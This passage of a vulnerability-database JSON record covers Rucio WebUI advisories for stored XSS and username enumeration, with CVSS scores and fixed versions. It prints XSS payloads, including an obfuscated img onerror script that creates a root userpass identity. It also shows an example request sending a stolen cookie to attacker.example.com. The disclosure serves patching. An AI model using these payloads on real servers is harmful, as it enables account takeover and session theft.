would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\nAttackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.\n\n**XSS Payload to Create Root UserPass**\n```html\n<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>\n```\n\n---\n### Remediation / Mitigation\nAll client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as `.html()` should be avoided unless the content is explicitly sanitized. Safer alternatives include `.text()`, creating text nodes, or using a templating system that enforces automatic escaping.\n\nAdditional defense-in-depth measures include:\n- Enforcing a strict Content Security Policy (CSP).\n- Setting the HttpOnly flag on session cookies.\n- Avoiding exposure of API tokens in JavaScript-accessible variables.\n\n> Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n---\n### Resources\n- OWASP XSS Prevention Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25734","reference_id":"","reference_type":"","scores":[{"value":"0.00092","scoring_system":"epss","scoring_elements":"0.25931","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25734"},{"reference_url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T16:01:30Z/"}],"url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"},{"reference_url":"https://github.com/rucio/rucio","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/35.8.3","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T16:01:30Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/35.8.3"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/38.5.4","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T16:01:30Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/38.5.4"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/39.3.1","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T16:01:30Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/39.3.1"},{"reference_url":"https://github.com/rucio/rucio/security/advisories/GHSA-h9fp-p2p9-873q","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T16:01:30Z/"}],"url":"https://github.com/rucio/rucio/security/advisories/GHSA-h9fp-p2p9-873q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25734","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25734"},{"reference_url":"https://github.com/advisories/GHSA-h9fp-p2p9-873q","reference_id":"GHSA-h9fp-p2p9-873q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h9fp-p2p9-873q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/55271?format=json","purl":"pkg:pypi/rucio-webui@35.8.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@35.8.3"},{"url":"http://public2.vulnerablecode.io/api/packages/55275?format=json","purl":"pkg:pypi/rucio-webui@38.5.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@38.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/55277?format=json","purl":"pkg:pypi/rucio-webui@39.3.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@39.3.1"}],"aliases":["CVE-2026-25734","GHSA-h9fp-p2p9-873q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jtev-r8r4-vfd5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19724?format=json","vulnerability_id":"VCID-k519-hpbg-53h7","summary":"Rucio WebUI has Username Enumeration via Login Error Message\n### Summary\nThe WebUI login endpoint returns distinct error messages depending on whether a supplied username exists, allowing unauthenticated attackers to enumerate valid usernames.\n\n### Details\nWhen submitting invalid credentials to `/ui/login`, the WebUI responds with different error messages based on the existence of the provided username (identity). A non-existent username results in an error indicating that no account is associated with the identity, while an existing username with an incorrect password produces a different authentication-related error.\n\nThis behavioral difference allows an attacker to distinguish valid usernames from invalid ones by observing the response content.\n\n### Proof of Concept\n**Bogus Login (Non-existent Username \"15251087\")**  \nResponse contains:\n```\nCannot get find any account associated with 15251087 identity.\n```\n\n**Bogus Login (Existing Username \"root\", Wrong Password)**  \nResponse contains:\n```\nCannot get auth token. It is possible that the presented identity root is not mapped to any Rucio account root.\n```\n\nThe difference in error messages confirms whether a username exists.\n\n### Impact\nAn unauthenticated attacker can enumerate valid usernames, which may be leveraged for targeted password guessing, credential stuffing, or social engineering attacks.\n\n### Remediation / Mitigation\nReturn a generic authentication failure message for all login errors, regardless of whether the username exists. Avoid disclosing account or identity existence through error responses. Consider implementing rate limiting or additional login throttling to further reduce abuse.\n\n#### Reources:\n- OWASP Authentication Cheat Sheet -  Authentication and Error Messages: https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html#authentication-and-error-messages","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25138","reference_id":"","reference_type":"","scores":[{"value":"0.00077","scoring_system":"epss","scoring_elements":"0.2302","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25138"},{"reference_url":"https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html#authentication-and-error-messages","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:03:18Z/"}],"url":"https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html#authentication-and-error-messages"},{"reference_url":"https://github.com/rucio/rucio","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/35.8.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:03:18Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/35.8.3"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/38.5.4","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:03:18Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/38.5.4"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/39.3.1","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:03:18Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/39.3.1"},{"reference_url":"https://github.com/rucio/rucio/security/advisories/GHSA-38wq-6q2w-hcf9","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:03:18Z/"}],"url":"https://github.com/rucio/rucio/security/advisories/GHSA-38wq-6q2w-hcf9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25138","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25138"},{"reference_url":"https://github.com/advisories/GHSA-38wq-6q2w-hcf9","reference_id":"GHSA-38wq-6q2w-hcf9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-38wq-6q2w-hcf9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/55271?format=json","purl":"pkg:pypi/rucio-webui@35.8.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@35.8.3"},{"url":"http://public2.vulnerablecode.io/api/packages/55275?format=json","purl":"pkg:pypi/rucio-webui@38.5.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@38.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/55277?format=json","purl":"pkg:pypi/rucio-webui@39.3.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@39.3.1"}],"aliases":["CVE-2026-25138","GHSA-38wq-6q2w-hcf9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k519-hpbg-53h7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19641?format=json","vulnerability_id":"VCID-uu7j-pay1-9qd1","summary":"Rucio WebUI has a Stored Cross-site Scripting (XSS) vulnerability its Identity Name\n### Summary\nA stored Cross-site Scripting (XSS) vulnerability was identified in the Identity Name of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.\n\n---\n### Details\nThe identity name is stored and later rendered without output encoding.\n\n**Create Path**:  \nAdmin > Account Management > _ACCOUNT NAME_ > Add Account Identity\n\n**Trigger Path**:  \nAdmin > Account Management > _ACCOUNT NAME_  \n(`https://127.0.0.1:8443/ui/account?account=pentest`)\n\n**Request**\n```http\nPOST /proxy/accounts/pentest/identities HTTP/1.1\n...\n{\"identity\":\"<script>alert(document.cookie)</script>\",\"authtype\":\"SSH\",\"email\":\"Test\"}\n```\n\n**Response**\n```http\nHTTP/1.1 201 CREATED\n...\nCreated\n```\n\n**Storing XSS payload in account identity name**\n<img width=\"1385\" height=\"807\" alt=\"Storing XSS payload in account identity name\" src=\"https://github.com/user-attachments/assets/e4209ef4-fd88-492f-9fb0-afb7d04b15ce\" />\n\n**Triggering XSS payload when viewing account**\n<img width=\"1395\" height=\"745\" alt=\"Triggering XSS payload when viewing account\" src=\"https://github.com/user-attachments/assets/e6217669-a0f7-4aba-bb05-f4fb7049611c\" />\n\n---\n### Impact\nAny authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.\n\nThe impact is amplified by:\n- Session cookies that are accessible to JavaScript (missing HttpOnly flag).\n- API tokens exposed to the WebUI via JavaScript variables.\n\nAn attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\nAttackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.\n\n**XSS Payload to Create Root UserPass**\n```html\n<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>\n```\n\n---\n### Remediation / Mitigation\nAll client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as `.html()` should be avoided unless the content is explicitly sanitized. Safer alternatives include `.text()`, creating text nodes, or using a templating system that enforces automatic escaping.\n\nAdditional defense-in-depth measures include:\n- Enforcing a strict Content Security Policy (CSP).\n- Setting the HttpOnly flag on session cookies.\n- Avoiding exposure of API tokens in JavaScript-accessible variables.\n\n> Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n---\n### References\n- OWASP XSS Prevention Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25735","reference_id":"","reference_type":"","scores":[{"value":"0.00092","scoring_system":"epss","scoring_elements":"0.25931","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25735"},{"reference_url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"},{"reference_url":"https://github.com/rucio/rucio","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/35.8.3","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/releases/tag/35.8.3"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/38.5.4","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/releases/tag/38.5.4"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/39.3.1","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/releases/tag/39.3.1"},{"reference_url":"https://github.com/rucio/rucio/security/advisories/GHSA-8wpv-6x3f-3rm5","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/security/advisories/GHSA-8wpv-6x3f-3rm5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25735","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25735"},{"reference_url":"https://github.com/advisories/GHSA-8wpv-6x3f-3rm5","reference_id":"GHSA-8wpv-6x3f-3rm5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8wpv-6x3f-3rm5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/55271?format=json","purl":"pkg:pypi/rucio-webui@35.8.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@35.8.3"},{"url":"http://public2.vulnerablecode.io/api/packages/55275?format=json","purl":"pkg:pypi/rucio-webui@38.5.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@38.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/55277?format=json","purl":"pkg:pypi/rucio-webui@39.3.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@39.3.1"}],"aliases":["CVE-2026-25735","GHSA-8wpv-6x3f-3rm5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uu7j-pay1-9qd1"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@1.25.3.post2"}